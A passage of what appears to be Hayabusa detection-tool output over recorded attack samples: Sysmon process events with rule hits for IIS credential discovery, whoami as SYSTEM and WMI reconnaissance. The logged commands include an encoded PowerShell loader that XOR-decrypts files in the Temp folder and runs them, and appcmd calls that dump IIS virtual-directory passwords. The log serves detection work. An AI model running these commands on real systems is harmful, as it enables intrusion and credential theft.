wB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3640 | PGUID: 365ABB72-3D6F-5CEB-0000-001072D7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.034 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: 
C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1900 | PGUID: 365ABB72-3D6F-5CEB-0000-001032DBFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.124 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7
ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.204 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.305 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2640 | PGUID: 365ABB72-3D70-5CEB-0000-001072E6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.435 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.555 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-28 00:12:38.241 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | 
PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:43.990 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:44.055 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 
365ABB72-FE6C-5CEB-0000-0010050C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:44.055 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.491 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.491 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:46.981 +09:00,IEWIN7,11,info,,File Created,Path: 
